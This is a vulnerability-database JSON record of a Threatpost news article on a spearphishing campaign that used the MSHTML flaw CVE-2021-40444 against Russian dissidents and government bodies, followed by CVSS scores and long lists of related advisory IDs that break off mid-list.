DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. \u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "published": "2022-03-30T13:13:49", "modified": "2022-03-30T13:13:49", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "reporter": "Elizabeth Montalbano", "references": ["https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/", "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/", "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", "https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/", "https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/", "https://threatpost.com/destructive-wiper-organizations-ukraine/178937/", "https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/", "https://bit.ly/3Jy6Bfs"], "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "immutableFields": [], "lastseen": "2022-03-30T15:11:13", "viewCount": 79, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0554", "CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-3100", "CVE-2021-40444", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "0990FE6E-7DC3-559E-9B84-E739872B988C", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "111C9F44-593D-5E56-8040-615B48ED3E24", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24DE1902-4427-5442-BF63-7657293966E2", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BC80C90-569E-5084-8C0E-891F12F1805E", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9A69678-D96F-528D-B436-366259B4A283", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", 